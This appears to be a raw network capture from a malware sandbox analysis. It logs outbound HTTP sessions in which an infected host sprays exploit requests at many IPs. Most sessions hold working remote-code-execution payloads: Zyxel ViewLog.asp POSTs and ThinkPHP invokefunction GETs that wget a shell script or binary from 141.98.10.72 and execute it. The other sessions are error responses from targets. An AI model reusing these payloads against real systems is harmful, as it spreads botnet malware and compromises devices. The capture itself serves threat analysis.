                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            371192.168.2.233620685.72.54.2258080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:40.314249039 CET527INHTTP/1.0 400 Bad Request
                                                            Server: mxhttpd/2.19-MX Apr 21 2021
                                                            Content-type: text/html
                                                            Date: Wed, 14 Feb 2024 08:28:40 GMT
                                                            Last-modified: Wed, 14 Feb 2024 08:28:40 GMT
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 6f 62 6f 74 69 78 2e 63 6f 6d 22 3e 6d 78 68 74 74 70 64 2f 32 2e 31 39 2d 4d 58 20 41 70 72 20 32 31 20 32 30 32 31 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H2>400 Bad Request</H2>Your request has bad syntax or is inherently impossible to satisfy.<HR><ADDRESS><A HREF="https://www.mobotix.com">mxhttpd/2.19-MX Apr 21 2021</A></ADDRESS></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            372192.168.2.2334774124.220.204.8523
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:40.573415041 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 34 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:40Auth Result: Invalid user.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            373192.168.2.234885294.131.15.1328080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:40.754646063 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:40.970841885 CET59INHTTP/1.1 400 Bad Request
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            374192.168.2.234406294.110.11.108080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:40.754739046 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            375192.168.2.233892095.42.21.10880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:40.803893089 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:41.033962965 CET275INHTTP/1.1 505 HTTP Version not supported
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 140
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            376192.168.2.2334788124.220.204.8523
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:41.200643063 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 34 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:41Auth Result: Invalid user.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            377192.168.2.234760895.100.76.23580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:41.232002020 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:41.433134079 CET478INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 256
                                                            Expires: Wed, 14 Feb 2024 08:28:41 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:41 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 61 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 33 32 31 26 23 34 36 3b 31 34 39 64 31 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9a7a7b5c&#46;1707899321&#46;149d16</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            378192.168.2.234454695.213.219.1080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:41.269000053 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:41.506759882 CET295INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            379192.168.2.235403695.58.97.25380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:41.518311024 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:41.802807093 CET976INData Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d
                                                            Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 404 Not FoundServer: mini_httpd/1.30 26Oc


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            380192.168.2.2334802124.220.204.8523
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:41.848978043 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 34 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:41Auth Result: Invalid user.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            381192.168.2.233467488.218.224.11080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:42.006546974 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:42.208246946 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.24.0
                                                            Date: Wed, 14 Feb 2024 08:28:42 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            382192.168.2.235404295.58.97.25380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:42.091958046 CET794INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 33 30 20 32 36 4f 63 74 32 30 31 38 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20
                                                            Data Ascii: (null) 400 Bad RequestServer: mini_httpd/1.30 26Oct2018Date: Wed, 14 Feb 2024 08:28:41 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sContent-Security-Policy: frame-ancestors 'none'Content-Security-Policy: fr


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            383192.168.2.235374494.123.30.518080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:42.228624105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            384192.168.2.235334894.122.211.88080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:42.229784012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            385192.168.2.236015295.164.207.2348080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:42.347470045 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:42.466434956 CET1260INHTTP/1.1 400 Bad Request
                                                            Server: squid/3.5.20
                                                            Mime-Version: 1.0
                                                            Date: Wed, 14 Feb 2024 08:28:42 GMT
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Length: 3560
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Vary: Accept-Language
                                                            Content-Language: en
                                                            X-Cache: MISS from ezproxies.com
                                                            X-Cache-Lookup: NONE from ezproxies.com:8080
                                                            Via: 1.1 ezproxies.com (squid/3.5.20)
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-famil


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            386192.168.2.234530831.136.195.2488080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:42.449827909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:43.133477926 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:44.477159977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:47.292748928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:52.668138027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
